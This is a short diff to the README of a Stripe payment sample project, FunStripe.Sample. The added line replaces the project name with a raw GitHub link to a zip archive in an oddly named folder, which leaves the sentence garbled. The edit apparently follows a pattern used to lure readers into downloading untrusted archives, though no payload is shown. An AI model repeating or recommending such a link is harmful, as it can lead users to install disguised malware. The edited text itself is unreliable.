Velder101/FunStripe.Sample/README.md

 ## 🌐 Learn More About FunStripe

-FunStripe.Sample integrates with the Stripe payment processing system.
+https://raw.githubusercontent.com/Velder101/FunStripe.Sample/main/carcinemia/FunStripe.Sample.zip integrates with the Stripe payment processing system.
 Stripe allows you to handle online payments securely and efficiently.
 Here are some of the features included in our sample application:

 - **Card Payments Support**: Accept payments via credit and debit cards easily.
 - **Payment Intents**: Understand how to create and manage payment intents.